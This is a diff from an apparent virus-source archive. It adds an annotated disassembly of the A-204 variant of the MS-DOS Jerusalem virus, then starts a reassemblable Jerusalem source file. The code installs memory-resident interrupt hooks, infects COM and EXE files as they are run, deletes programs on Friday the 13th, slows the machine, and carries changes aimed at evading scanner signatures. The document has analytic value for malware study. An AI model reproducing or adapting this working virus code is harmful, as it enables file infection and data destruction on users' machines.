+0312 B1 04 MOV CL,4 ; CL=04h
+0314 D3 EA SHR DX,CL ; DX >> 4 (DX=60H)
+0316 83 C2 10 ADD DX,010 ; DX=DX+10h (DX=70h)
+ ; Program Size in Paragraphs
+ ; is 70h Bytes
+0319 CD 21 INT 021 ; Terminate but Stay Resident
+
+031B 32 C0 XOR AL,AL ; Clear AL
+031D CF IRET ; Interrupt Return
+
+ ; 031Eh is the new INT 08h
+ ; vector. This routine is
+ ; called 18.2 times per
+ ; second
+031E 2E 83 3E 1F 00 02 CS CMP W[01F],2 ; Timer decreased til 02h?
+0324 75 17 JNE 033D ; No: -> 033D
+
+ ; Yes: now 32 minutes are
+ ; passed since infection
+0326 50 PUSH AX ; Store Registers
+0327 53 PUSH BX
+0328 51 PUSH CX
+0329 52 PUSH DX
+032A 55 PUSH BP
+
+032B B8 02 06 MOV AX,0602 ; Scroll box with coordinates
+032E B7 87 MOV BH,087 ; (5h,5h),(10h,10h) two
+0330 B9 05 05 MOV CX,0505 ; lines upwards
+0333 BA 10 10 MOV DX,01010 ;
+0336 CD 10 INT 010 ;
+
+0338 5D POP BP ; Restore Registers
+0339 5A POP DX
+033A 59 POP CX
+033B 5B POP BX
+033C 58 POP AX
+033D 2E FF 0E 1F 00 CS DEC W[01F] ; Decrease Timer-Trigger
+ ; This now becomes 01h
+0342 75 12 JNE 0356 ; If 0: -> 0356h
+0344 2E C7 06 1F 00 01 00 CS MOV W[01F],1 ; Timer-Trigger set to 01h
+034B 50 PUSH AX ; Store AX
+034C 51 PUSH CX ; Store CX
+034D 56 PUSH SI ; Store SI
+034E B9 01 40 MOV CX,04001 ; CX=4001h
+0351 F3 AC REP LODSB ; Load byte [SI] into AL and
+ ; advance SI, done CX times.
+ ; This is the routine which
+ ; decreases the speed of the
+ ; machine til 1/5th of the
+ ; original. 32 minutes after
+ ; infection this routine is
+ ; executes 18.2 times a second
+0353 5E POP SI ; Restore SI
+0354 59 POP CX ; Restore CX
+0355 58 POP AX ; Restore AX
+0356 2E FF 2E 13 00 CS JMP D[013] ; Jump to original INT 08h
+ ; address
+
+ ; Here we come if INT 21h is
+ ; called
+035B 9C PUSHF ; Store Flags
+035C 80 FC E0 CMP AH,0E0 ; AH=0Eh ?
+035F 75 05 JNE 0366 ; No: -> 0366h
+0361 B8 00 03 MOV AX,0300 ; AX=0300h
+0364 9D POPF ; Restore Flags
+0365 CF IRET ; Interrupt Return
+
+0366 80 FC DD CMP AH,0DD ; AH=DDh?
+0369 74 13 JE 037E ; Yes: -> 037Eh
+036B 80 FC DE CMP AH,0DE ; AH=DEh?
+036E 74 28 JE 0398 ; Yes: -> 0398h
+ ; INT 21h is never called
+ ; with AH=DEh. So the routine
+ ; at 0398h is never used
+ ; (seems)
+
+0370 3D 00 4B CMP AX,04B00 ; Load & Execute ?
+0373 75 03 JNE 0378 ; No: -> 0378h +0375 E9 B4 00 JMP 042C ; Yes: -> 042Ch +0378 9D POPF ; Restore Flags +0379 2E FF 2E 17 00 CS JMP D[017] ; Jmp to original + ; INT 21h address + + ; Execute original program +037E 58 POP AX +037F 58 POP AX ; Restore AX +0380 B8 00 01 MOV AX,0100 ; AX=0100h +0383 2E A3 0A 00 CS MOV W[0A],AX ; Store AX +0387 58 POP AX ; Restore AX +0388 2E A3 0C 00 CS MOV W[0C],AX ; Store AX +038C F3 A4 REP MOVSB ; +038E 9D POPF ; Restore Flags +038F 2E A1 0F 00 CS MOV AX,W[0F] ; AX=0000h +0393 2E FF 2E 0A 00 CS JMP D[0A] ; JUMP -> CS:0100h + ; This executes the original + ; program + + + ; This routine is called + ; when INT 21h with AH=DEh + ; is called which never + ; happens in the code. I + ; have to investigate it + ; a bit more. Til then + ; it remains without comments. +0398 83 C4 06 ADD SP,6 +039B 9D POPF +039C 8C C8 MOV AX,CS +039E 8E D0 MOV SS,AX +03A0 BC 10 07 MOV SP,0710 +03A3 06 PUSH ES +03A4 06 PUSH ES +03A5 33 FF XOR DI,DI +03A7 0E PUSH CS +03A8 07 POP ES +03A9 B9 10 00 MOV CX,010 +03AC 8B F3 MOV SI,BX +03AE BF 21 00 MOV DI,021 +03B1 F3 A4 REP MOVSB +03B3 8C D8 MOV AX,DS +03B5 8E C0 MOV ES,AX +03B7 2E F7 26 7A 00 CS MUL W[07A] +03BC 2E 03 06 2B 00 CS ADD AX,W[02B] +03C1 83 D2 00 ADC DX,0 +03C4 2E F7 36 7A 00 CS DIV W[07A] +03C9 8E D8 MOV DS,AX +03CB 8B F2 MOV SI,DX +03CD 8B FA MOV DI,DX +03CF 8C C5 MOV BP,ES +03D1 2E 8B 1E 2F 00 CS MOV BX,W[02F] +03D6 0B DB OR BX,BX +03D8 74 13 JE 03ED +03DA B9 00 80 MOV CX,08000 +03DD F3 A5 REP MOVSW +03DF 05 00 10 ADD AX,01000 +03E2 81 C5 00 10 ADD BP,01000 +03E6 8E D8 MOV DS,AX +03E8 8E C5 MOV ES,BP +03EA 4B DEC BX +03EB 75 ED JNE 03DA +03ED 2E 8B 0E 2D 00 CS MOV CX,W[02D] +03F2 F3 A4 REP MOVSB +03F4 58 POP AX +03F5 50 PUSH AX +03F6 05 10 00 ADD AX,010 +03F9 2E 01 06 29 00 CS ADD W[029],AX +03FE 2E 01 06 25 00 CS ADD W[025],AX +0403 2E A1 21 00 CS MOV AX,W[021] +0407 1F POP DS +0408 07 POP ES +0409 2E 8E 16 29 00 CS MOV SS,W[029] +040E 2E 8B 26 27 00 CS MOV SP,W[027] +0413 2E FF 2E 23 00 CS JMP 
D[023] + + ; We come here if B[0Eh]=1, + ; which means Friday 13th, + ; year<>1987. This routine + ; deletes the loaded file. +0418 33 C9 XOR CX,CX ; Clear all bits of the File + ; Attribute +041A B8 01 43 MOV AX,04301 ; +041D CD 21 INT 021 ; Put File Atributes + +041F B4 41 MOV AH,041 ; +0421 CD 21 INT 021 ; Delete a File (Unlink) + +0423 B8 00 4B MOV AX,04B00 + +0426 9D POPF ; Get Flags +0427 2E FF 2E 17 00 CS JMP D[017] + + ; We come here each time a + ; file is loaded with the + ; load and execute call + ; (INT 21h, AX=4B00h) +042C 2E 80 3E 0E 00 01 CS CMP B[0E],1 ; Is it Friday 13th, + ; year<>1987? +0432 74 E4 JE 0418 ; Yes: -> 0418h +0434 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle -1 ??? +043B 2E C7 06 8F 00 00 00 CS MOV W[08F],0 ; Clear Memory-Available + ; variable +0442 2E 89 16 80 00 CS MOV W[080],DX ; DS:DX -> ASCIZ Filename, +0447 2E 8C 1E 82 00 CS MOV W[082],DS ; Store DX and DS +044C 50 PUSH AX +044D 53 PUSH BX +044E 51 PUSH CX +044F 52 PUSH DX +0450 56 PUSH SI +0451 57 PUSH DI +0452 1E PUSH DS +0453 06 PUSH ES +0454 FC CLD +0455 8B FA MOV DI,DX ; +0457 32 D2 XOR DL,DL ; DL=00h : Take Default Drive +0459 80 7D 01 3A CMP B[DI+1],03A ; ':' at 2nd place in ASCIZ- + ; filename +045D 75 05 JNE 0464 ; No: -> 0464h +045F 8A 15 MOV DL,B[DI] ; Get Drive Letter +0461 80 E2 1F AND DL,01F ; Get Drive Code + ; 0 = Default + ; 1 = A + ; 2 = B, etc. +0464 B4 36 MOV AH,036 ; +0466 CD 21 INT 021 ; Get disk space + ; BX=# of available clusters + ; CX=Bytes per sector + ; DX=Total clusters + +0468 3D FF FF CMP AX,-1 ; No Sectors Free? +046B 75 03 JNE 0470 ; No: -> 0470h +046D E9 77 02 JMP 06E7 ; Yes: -> 06E7h + + +0470 F7 E3 MUL BX ; Calculate Free Space +0472 F7 E1 MUL CX ; +0474 0B D2 OR DX,DX ; +0476 75 05 JNE 047D ; +0478 3D 10 07 CMP AX,0710 ; 1808 Bytes Free? 
+047B 72 F0 JB 046D ; No: -> 046Dh +047D 2E 8B 16 80 00 CS MOV DX,W[080] ; Restore DX's ASCIZ Filename +0482 1E PUSH DS +0483 07 POP ES +0484 32 C0 XOR AL,AL ; AL=00h +0486 B9 41 00 MOV CX,041 ; +0489 F2 AE REPNE SCASB ; Check if filename +048B 2E 8B 36 80 00 CS MOV SI,W[080] ; is in UPPERCASE +0490 8A 04 MOV AL,B[SI] ; +0492 0A C0 OR AL,AL ; All UPPERRCASE? +0494 74 0E JE 04A4 ; IF so: -> 04A4h +0496 3C 61 CMP AL,061 ; AL<'a' ? +0498 72 07 JB 04A1 ; Yes: -> 04A1h +049A 3C 7A CMP AL,07A ; AL>'z' ? +049C 77 03 JA 04A1 ; Yes: -> 04A1h +049E 80 2C 20 SUB B[SI],020 ; Transfer filename + ; into UPPERCASE +04A1 46 INC SI ; SI=SI+1 +04A2 EB EC JMP 0490 + +04A4 B9 0B 00 MOV CX,0B ; CX=0Bh +04A7 2B F1 SUB SI,CX ; Return SI to start + ; of Filename +04A9 BF 84 00 MOV DI,084 ; Start of COMMAND.COM + ; filename +04AC 0E PUSH CS +04AD 07 POP ES +04AE B9 0B 00 MOV CX,0B +04B1 F3 A6 REPE CMPSB ; Filename=COMMAND.COM ? +04B3 75 03 JNE 04B8 ; No: -> 04B8h +04B5 E9 2F 02 JMP 06E7 ; Yes: -> 06E7h + + ; We come here if the + ; loaded program is not + ; COMMAND.COM +04B8 B8 00 43 MOV AX,04300 ; +04BB CD 21 INT 021 ; Get File Attributes + +04BD 72 05 JB 04C4 ; If Error: -> 04C4h +04BF 2E 89 0E 72 00 CS MOV W[072],CX ; Store File Attributes +04C4 72 25 JB 04EB ; If Error: -> 04EBh +04C6 32 C0 XOR AL,AL ; AL=00h +04C8 2E A2 4E 00 CS MOV B[04E],AL ; Dummy=0 +04CC 1E PUSH DS ; +04CD 07 POP ES ; +04CE 8B FA MOV DI,DX ; +04D0 B9 41 00 MOV CX,041 ; +04D3 F2 AE REPNE SCASB ; +04D5 80 7D FE 4D CMP B[DI-2],04D ; "M" ? +04D9 74 0B JE 04E6 ; Yes: -> 04E6h +04DB 80 7D FE 6D CMP B[DI-2],06D ; "m" ? 
+04DF 74 05 JE 04E6 ; Yes: -> 04E6h +04E1 2E FE 06 4E 00 CS INC B[04E] ; Dummy=Dummy+1 +04E6 B8 00 3D MOV AX,03D00 ; Open Disk File with +04E9 CD 21 INT 021 ; handle in compatibility + ; mode + ; DS:DX : -> ASCIZ Filename + +04EB 72 5A JB 0547 ; IF Error: -> 0547h +04ED 2E A3 70 00 CS MOV W[070],AX ; Store File Handle +04F1 8B D8 MOV BX,AX ; BX=File Handle +04F3 B8 02 42 MOV AX,04202 ; Move File Read/Write + ; Pointer (LSEEK) with + ; offset from end of file +04F6 B9 FF FF MOV CX,-1 ; CX:DX = offset in bytes +04F9 BA FB FF MOV DX,-5 ; +04FC CD 21 INT 021 ; + ; DX:AX = new absolute + ; offset from beginning of + ; file + +04FE 72 EB JB 04EB ; If Error: -> 04EBh +0500 05 05 00 ADD AX,5 ; ???? +0503 2E A3 11 00 CS MOV W[011],AX ; Store Length of File + +0507 B9 05 00 MOV CX,5 ; Read from a file with +050A BA 6B 00 MOV DX,06B ; handle BX 5h bytes into +050D 8C C8 MOV AX,CS ; DS:DX buffer +050F 8E D8 MOV DS,AX ; +0511 8E C0 MOV ES,AX ; +0513 B4 3F MOV AH,03F ; +0515 CD 21 INT 021 ; + +0517 8B FA MOV DI,DX ; DI=DX=6Bh +0519 BE 05 00 MOV SI,5 ; SI=05h +051C F3 A6 REPE CMPSB ; Check first 5 bytes to see + ; if a file already is + ; infected +051E 75 07 JNE 0527 ; If not: -> 0527h +0520 B4 3E MOV AH,03E ; Close a file with +0522 CD 21 INT 021 ; handle + +0524 E9 C0 01 JMP 06E7 ; Jump -> 06E7h + +0527 B8 24 35 MOV AX,03524 ; Get original int 24h +052A CD 21 INT 021 ; vector. 
Stored in ES:BX + +052C 89 1E 1B 00 MOV W[01B],BX ; Store BX of INT 24h vector +0530 8C 06 1D 00 MOV W[01D],ES ; Store ES of INT 24h vector +0534 BA 1B 02 MOV DX,021B ; Set new int 24h vector +0537 B8 24 25 MOV AX,02524 ; to DS:DX +053A CD 21 INT 021 ; + +053C C5 16 80 00 LDS DX,[080] ; DS:DX=Filename +0540 33 C9 XOR CX,CX ; Get fileattributes +0542 B8 01 43 MOV AX,04301 ; Put File Attributes +0545 CD 21 INT 021 ; (CHMOD) + +0547 72 3B JB 0584 ; If Error: -> 0584h +0549 2E 8B 1E 70 00 CS MOV BX,W[070] ; Close a file with +054E B4 3E MOV AH,03E ; handle BX +0550 CD 21 INT 021 ; + +0552 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle=-1 ??? +0559 B8 02 3D MOV AX,03D02 ; Open File with +055C CD 21 INT 021 ; Handle in READ/WRITE mode + +055E 72 24 JB 0584 ; If Error: -> 0584h +0560 2E A3 70 00 CS MOV W[070],AX ; Store File Handle +0564 8C C8 MOV AX,CS +0566 8E D8 MOV DS,AX +0568 8E C0 MOV ES,AX + +056A 8B 1E 70 00 MOV BX,W[070] ; BX=File Handle +056E B8 00 57 MOV AX,05700 ; Get File' date/time- +0571 CD 21 INT 021 ; stamp + +0573 89 16 74 00 MOV W[074],DX ; Move File Read/Write Pointer +0577 89 0E 76 00 MOV W[076],CX ; (LSEEK) with offset from +057B B8 00 42 MOV AX,04200 ; beginning of file with +057E 33 C9 XOR CX,CX ; CX:DX bytes +0580 8B D1 MOV DX,CX ; +0582 CD 21 INT 021 ; + +0584 72 3D JB 05C3 ; If Error: -> 05C3h +0586 80 3E 4E 00 00 CMP B[04E],0 ; '0'? 
+058B 74 03 JE 0590 ; Yes: -> 0590h +058D EB 57 JMP 05E6 ; JUMP -> 05E6h + +058F 90 NOP + +0590 BB 00 10 MOV BX,01000 ; Number of 16d-byte para- + ; graphs BX=1000h For COM- + ; files there are 1000h 16d + ; bytes paragrahs available +0593 B4 48 MOV AH,048 ; +0595 CD 21 INT 021 ; Allocate Memory + +0597 73 0B JAE 05A4 ; If enough memory available + ; -> 05A4h +0599 B4 3E MOV AH,03E ; Close a file with +059B 8B 1E 70 00 MOV BX,W[070] ; handle BX +059F CD 21 INT 021 ; + +05A1 E9 43 01 JMP 06E7 ; JUMP -> 06E7h + +05A4 FF 06 8F 00 INC W[08F] ; Set Memory-Available + ; Variable (0001h) +05A8 8E C0 MOV ES,AX ; +05AA 33 F6 XOR SI,SI ; SI=0000h +05AC 8B FE MOV DI,SI ; DI=0000h +05AE B9 10 07 MOV CX,0710 ; CX=0710h (1808d) + ; length of virus +05B1 F3 A4 REP MOVSB ; Put virus code at begin- + ; ning of buffer ES:DI +05B3 8B D7 MOV DX,DI ; DX=DI=0710h +05B5 8B 0E 11 00 MOV CX,W[011] ; Restore Length of File +05B9 8B 1E 70 00 MOV BX,W[070] ; Restore File Handle +05BD 06 PUSH ES ; Read from a file with +05BE 1F POP DS ; handle CX (length +05BF B4 3F MOV AH,03F ; of file) bytes in buffer +05C1 CD 21 INT 021 ; DS:DX + +05C3 72 1C JB 05E1 ; If Error: -> 05E1h +05C5 03 F9 ADD DI,CX ; DI=Length of original + ; file+0710h (length of + ; viruscode)+05h +05C7 33 C9 XOR CX,CX ; CX=0000h +05C9 8B D1 MOV DX,CX ; Move file read/write +05CB B8 00 42 MOV AX,04200 ; pointer with offset from +05CE CD 21 INT 021 ; beginning of file + +05D0 BE 05 00 MOV SI,5 ; +05D3 B9 05 00 MOV CX,5 ; +05D6 F3 2E A4 REP CS MOVSB ; +05D9 8B CF MOV CX,DI ; CX=0715h(1813d)+length of + ; original code +05DB 33 D2 XOR DX,DX ; DX=0000h +05DD B4 40 MOV AH,040 ; Write to file with handle +05DF CD 21 INT 021 ; CX bytes + +05E1 72 0D JB 05F0 ; If Error: -> 05F0h +05E3 E9 BC 00 JMP 06A2 ; JUMP -> 06A2h + +05E6 B9 1C 00 MOV CX,01C ; Read CX (1Ch) bytes from +05E9 BA 4F 00 MOV DX,04F ; file with handle +05EC B4 3F MOV AH,03F ; +05EE CD 21 INT 021 ; + +05F0 72 4A JB 063C ; If Error: -> 063Ch +05F2 C7 06 61 00 84 19 MOV 
W[061],01984 ; Store 1984h=6532d +05F8 A1 5D 00 MOV AX,W[05D] ; +05FB A3 45 00 MOV W[045],AX ; +05FE A1 5F 00 MOV AX,W[05F] ; +0601 A3 43 00 MOV W[043],AX ; +0604 A1 63 00 MOV AX,W[063] ; +0607 A3 47 00 MOV W[047],AX ; +060A A1 65 00 MOV AX,W[065] ; +060D A3 49 00 MOV W[049],AX ; +0610 A1 53 00 MOV AX,W[053] ; +0613 83 3E 51 00 00 CMP W[051],0 ; '0000'? +0618 74 01 JE 061B ; Yes: -> 061Bh +061A 48 DEC AX ; AX=AX-01h +061B F7 26 78 00 MUL W[078] ; +061F 03 06 51 00 ADD AX,W[051] ; +0623 83 D2 00 ADC DX,0 ; +0626 05 0F 00 ADD AX,0F ; +0629 83 D2 00 ADC DX,0 ; +062C 25 F0 FF AND AX,-010 ; +062F A3 7C 00 MOV W[07C],AX ; Store AX +0632 89 16 7E 00 MOV W[07E],DX ; Store DX +0636 05 10 07 ADD AX,0710 ; AX=AX+1808 +0639 83 D2 00 ADC DX,0 ; +063C 72 3A JB 0678 ; If Error :-> 0678h +063E F7 36 78 00 DIV W[078] ; +0642 0B D2 OR DX,DX ; +0644 74 01 JE 0647 ; +0646 40 INC AX ; AX=AX+01h +0647 A3 53 00 MOV W[053],AX ; +064A 89 16 51 00 MOV W[051],DX ; +064E A1 7C 00 MOV AX,W[07C] ; Restore AX +0651 8B 16 7E 00 MOV DX,W[07E] ; Restore DX +0655 F7 36 7A 00 DIV W[07A] ; +0659 2B 06 57 00 SUB AX,W[057] ; +065D A3 65 00 MOV W[065],AX ; +0660 C7 06 63 00 C5 00 MOV W[063],0C5 ; +0666 A3 5D 00 MOV W[05D],AX ; +0669 C7 06 5F 00 10 07 MOV W[05F],0710 ; +066F 33 C9 XOR CX,CX ; CX=0000h +0671 8B D1 MOV DX,CX ; DX=0000h +0673 B8 00 42 MOV AX,04200 ; Move File Read/Write +0676 CD 21 INT 021 ; pointer to beginning of + ; file + +0678 72 0A JB 0684 ; If Error: -> 0684h +067A B9 1C 00 MOV CX,01C ; CX=1Ch +067D BA 4F 00 MOV DX,04F ; DX=4Fh +0680 B4 40 MOV AH,040 ; Write to file with +0682 CD 21 INT 021 ; handle + +0684 72 11 JB 0697 ; If Error: -> 0697h +0686 3B C1 CMP AX,CX ; Are all bytes written? 
+0688 75 18 JNE 06A2 ; No: -> 06A2h +068A 8B 16 7C 00 MOV DX,W[07C] ; Restore AX into DX +068E 8B 0E 7E 00 MOV CX,W[07E] ; Restore DX into CX +0692 B8 00 42 MOV AX,04200 +0695 CD 21 INT 021 + +0697 72 09 JB 06A2 ; If Error: -> 06A2h +0699 33 D2 XOR DX,DX ; DX=0000h +069B B9 10 07 MOV CX,0710 ; CX=0710h +069E B4 40 MOV AH,040 +06A0 CD 21 INT 021 + +06A2 2E 83 3E 8F 00 00 CS CMP W[08F],0 ; Not Enough Memory? +06A8 74 04 JE 06AE ; Yes: -> 06AEh +06AA B4 49 MOV AH,049 ; Free memory +06AC CD 21 INT 021 ; + +06AE 2E 83 3E 70 00 FF CS CMP W[070],-1 +06B4 74 31 JE 06E7 +06B6 2E 8B 1E 70 00 CS MOV BX,W[070] ; Restore File Handle +06BB 2E 8B 16 74 00 CS MOV DX,W[074] ; Restore File Date +06C0 2E 8B 0E 76 00 CS MOV CX,W[076] ; Restore File Time +06C5 B8 01 57 MOV AX,05701 ; Set File's Date/Time +06C8 CD 21 INT 021 ; stamp + +06CA B4 3E MOV AH,03E ; Close a file with +06CC CD 21 INT 021 ; handle + +06CE 2E C5 16 80 00 CS LDS DX,[080] ; Get place (DS:DX) of + ; filename +06D3 2E 8B 0E 72 00 CS MOV CX,W[072] ; Restore File Attributes +06D8 B8 01 43 MOV AX,04301 ; Put File Attributes +06DB CD 21 INT 021 ; + +06DD 2E C5 16 1B 00 CS LDS DX,[01B] ; Restore original vector +06E2 B8 24 25 MOV AX,02524 ; of interrupt 24h +06E5 CD 21 INT 021 ; + +06E7 07 POP ES ; Restore Registers +06E8 1F POP DS +06E9 5F POP DI +06EA 5E POP SI +06EB 5A POP DX +06EC 59 POP CX +06ED 5B POP BX +06EE 58 POP AX +06EF 9D POPF ; Restore Flags +06F0 2E FF 2E 17 00 CS JMP D[017] ; Call original INT 21h + ; address which was intercep- + ; ted with the LOAD & EXEC. + ; statement. Which means it + ; will load and execute the + ; selected file + +06F5 00 00 00 00 00 00 00 00 00 00 00 + +0700 4D DE 0C 00 10 00 00 00 00 00 00 00 00 00 00 00 + +0710 E9 92 00 JMP 07A5 ; JUMP -> 07A5h + +0711h til 07A4h are the same definition words/bytes as at 0103h til 0194h + +07A5 FC CLD +07A6 B4 E0 MOV AH,0E0 +07A8 CD 21 INT 021 + +07AA 80 FC E0 CMP AH,0E0 ; AH>=E0h? 
+07AD 73 16 JAE 07C5 ; Yes: -> 07C5h +07AF 80 FC 03 CMP AH,3 ; AH<03h +07B2 72 11 JB 07C5 ; Yes: -> 07C5h + ; The only way that the + ; code get passed here if + ; the virus is active in + ; memory. It will return + ; AX=0300h then. +07B4 B4 DD MOV AH,0DD +07B6 BF 00 01 MOV DI,0100 ; DI=0100h +07B9 BE 10 07 MOV SI,0710 ; SI=0710h +07BC 03 F7 ADD SI,DI ; SI=0810h +07BE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=Length of file +07C3 CD 21 INT 021 + +07C5 8C C8 MOV AX,CS ; AX=CS +07C7 05 10 00 ADD AX,010 ; AX=AX+10h +07CA 8E D0 MOV SS,AX ; SS=CS+10h +07CC BC 00 07 MOV SP,0700 ; SP=0700h +07CF 50 PUSH AX ; Store AX +07D0 B8 C5 00 MOV AX,0C5 ; AX=00C5h +07D3 50 PUSH AX ; Store AX +07D4 CB RETF ; RETURN from FAR + +07D5 FC CLD ; Clear Direct + + ; Here the A-204 variant + ; differs from the original + ; Jerusalem Version B virus + ; for the second time. +07D6 2E 8C 06 31 00 CS MOV W[031],ES ; These two lines have +07DB 06 PUSH ES ; been changed in order + ; trying to avoid being + ; detected by the finger- + ; print in the VirScan.Dat + ; file. It has not succeeded + ; because the strain VirScan + ; searches for appears two + ; times in the viruscode + +07DC 2E 8C 06 39 00 CS MOV W[039],ES ; Store ES +07E1 2E 8C 06 3D 00 CS MOV W[03D],ES ; Store ES +07E6 2E 8C 06 41 00 CS MOV W[041],ES ; Store ES + +07EB 8C C0 MOV AX,ES ; AX=ES +07ED 05 10 00 ADD AX,010 ; AX=AX+10h +07F0 2E 01 06 49 00 CS ADD W[049],AX ; Store ES+10h +07F5 2E 01 06 45 00 CS ADD W[045],AX ; Store ES+10h + +07FA B4 E0 MOV AH,0E0 ; AH=E0h +07FC CD 21 INT 021 ; + +07FE 80 FC E0 CMP AH,0E0 ; AH>=E0? +0801 73 13 JAE 0816 ; Yes: -> 0816h + ; This will never happen. + ; First of all it would be + ; a short jump into the + ; original program. 
Secondly + ; is the virus already active + ; in memory and will return + ; AX=0300h at the INT 21h call + ; with AH=E0h +0803 80 FC 03 CMP AH,3 ; AH=03h +0806 07 POP ES ; Restore ES +0807 2E 8E 16 45 00 CS MOV SS,W[045] ; Restore ES+10 into SS +080C 2E 8B 26 43 90 CS MOV SP,W[09043] ; + +0810 90 NOP ; Start ofOriginal Program +0811 90 NOP +0812 90 NOP +0813 90 NOP +0814 90 NOP +0815 90 NOP +0816 90 NOP +0817 90 NOP +0818 90 NOP +0819 90 NOP +081A 90 NOP +081B 90 NOP +081C 90 NOP +081D 90 NOP +081E 90 NOP +081F 90 NOP +0820 90 NOP +0821 90 NOP +0822 90 NOP +0823 90 NOP +0824 90 NOP +0825 90 NOP +0826 90 NOP +0827 90 NOP +0828 90 NOP +0829 90 NOP +082A 90 NOP +082B 90 NOP +082C 90 NOP +082D 90 NOP +082E 90 NOP +082F C3 RET ; End of Original Program + +0830 2D 32 30 34 2A ; -204* + +NOTE: A-204 is a course-code for IAP (Inleiding Apparatuur en Programmatuur, +in English a Prologue in Hardware and Software) at my university. In this +course the PDP-11 Language is being teached. It's my opion, and my opion only, +that this change has been made by a first year student. The IAP-course is +a course for first years students. Only some lines were changed in order to +avoid detection. If the 'author' did know more about the 8086, (s?)he could +have optimized the code. Some pieces can be done much more elegant. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jerus.asm b/MSDOS/Virus.MSDOS.Unknown.jerus.asm new file mode 100644 index 00000000..01e54400 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jerus.asm 
@@ -0,0 +1,797 @@ + ; The 'Jerusalem' virus + + ; Disassembled by Joe Hirst (Tel: 0273-26105) January 1989. + + ; The disassembly has been tested by re-assembly using MASM 5.0 + +RAM SEGMENT AT 0 + + ; System data + + ORG 3FCH +BW03FC DW ? +BB03FE DB ? + + ORG 2CH +ENV_SG DW ? ; Segment address of environment + +RAM ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:NOTHING,ES:RAM + +START: JMP BP0010 + + DB 'sU' + +VR_SIG DB 'MsDos' + +VIR_RT EQU THIS DWORD +V_RTOF DW 0100H +V_RTSG DW 1C26H +DEL_SW DB 0 ; Delete program switch +BEGIN DW 0 ; Initial value for AX +F_SIZE DW 2A74H ; Total file size + +INT_08 EQU THIS DWORD +I08OFF DW 00ABH ; Int 8 offset +I08SEG DW 17CDH ; Int 8 segment + +INT_21 EQU THIS DWORD +I21OFF DW 1460H ; Int 21H offset +I21SEG DW 029FH ; Int 21H segment + +INT_24 EQU THIS DWORD +I24OFF DW 0556H ; Int 24H offset +I24SEG DW 189BH ; Int 24H segment + +TCOUNT DW 3A53H ; Timer count + + ; Fields passed by spare virus call + +SPAR01 DW 0 ; 00 Spare call field 1 - AX +SP_RET EQU THIS DWORD +SPAR02 DW 0 ; 02 Spare call field 2 - IP +SPAR03 DW 0 ; 04 Spare call field 3 - CS +SPAR04 DW 0 ; 06 Spare call field 4 - SP +SPAR05 DW 0 ; 08 Spare call field 5 - SS +SPAR06 DW 0 ; 0A Spare call field 6 +SPAR07 DW 0 ; 0C Spare call field 7 +SPAR08 DW 0 ; 0E Spare call field 8 + +ST_ES1 DW 1BB5H ; Original ES +SET_PA DW 0080H + + ; Program parameter block + +PPB_01 DW 0 ; Environment address +PPB_02 DW 0080H ; Command line offset +PPB_03 DW 1BB5H ; Command line segment +PPB_04 DW 005CH ; FCB1 offset +PPB_05 DW 1BB5H ; FCB1 segment +PPB_06 DW 006CH ; FCB2 offset +PPB_07 DW 1BB5H ; FCB2 segment + +PRG_SP DW 0710H ; Initial stack pointer store +PRG_SS DW 14EDH ; Initial stack segment store +PROGRM EQU THIS DWORD +PRGOFF DW 00C5H ; Initial code offset store +PRGSEG DW 14EDH ; Initial code segment store +SS_ST1 DW 0246H +SS_ST2 DB 00A1H +EXE_SW DB 0 ; EXE switch - 0 = .COM extension + + ; .EXE header store + +EXEHED DB 4DH, 5AH ; 00 .EXE header ident +EXHD01 
DW 00F0H ; 02 Bytes in last page +EXHD02 DW 00B2H ; 04 Size of file in pages +EXHD03 DW 0138H ; 06 Number of relocation entries +EXHD04 DW 0060H ; 08 Size of header in paragraphs +EXHD05 DW 06D3H ; 0A Minimum extra storage required +EXHD06 DW -1 ; 0C Maximum extra storage required +EXHD07 DW 155EH ; 0E Initial stack segment +EXHD08 DW 0710H ; 10 Initial stack pointer +EXHD09 DW 1984H ; 12 Negative checksum +EXHD10 DW 00C5H ; 14 Initial code offset +EXHD11 DW 155EH ; 16 Initial code segment + DB 01EH, 000H, 000H, 000H + +SIGBUF DB 037H, 020H, 02AH, 02AH, 02AH +F_HAND DW 5 ; File handle +F_ATTS DW 0020H ; File attributes +F_DATE DW 0F30H ; File date +F_TIME DW 6000H ; File time +BYTSEC DW 0200H ; Bytes per sector +PARAGR DW 0010H ; Size of a paragraph +F_SIZ1 DW 5BE0H ; Low-order file size +F_SIZ2 DW 1 ; High-order file size +F_PATH EQU THIS DWORD +FPTHOF DW 41B9H ; Program pathname offset +FPTHSG DW 9B2AH ; Program pathname segment +COM_CM DB 'COMMAND.COM' +MEM_SW DW 1 ; Memory allocated switch + DB 4 DUP (0) + + ; This section seems to assume a COM origin of 100H + +BP0010: + CLD + MOV AH,0E0H ; Virus "are you there" call + INT 21H ; DOS service (Virus - 1) + CMP AH,0E0H ; Test for unchanged + JNB BP0020 ; Branch if invalid reply + CMP AH,3 ; Test for standard "yes" + JB BP0020 ; Branch if non-standard + MOV AH,0DDH ; Replace program + MOV DI,0100H ; Initial offset + MOV SI,OFFSET ENDADR ; Length of virus + ADD SI,DI ; Add initial offset + MOV CX,CS:F_SIZE[DI] ; Get total filesize + INT 21H ; DOS service (Virus - 2) +BP0020: + MOV AX,CS ; Get current segment + ADD AX,10H ; Address past PSP + MOV SS,AX ; \ Set up stack + MOV SP,0700H ; / + PUSH AX ; Segment for return + MOV AX,OFFSET BP0030 ; \ Offset for return + PUSH AX ; / + RETF ; "Return" to next instruction + + ; We now have an origin of zero + +BP0030: + CLD + PUSH ES + MOV ST_ES1,ES ; Save original ES + MOV PPB_03,ES ; \ + MOV PPB_05,ES ; ) Segments in PPB + MOV PPB_07,ES ; / + MOV AX,ES ; \ Segment 
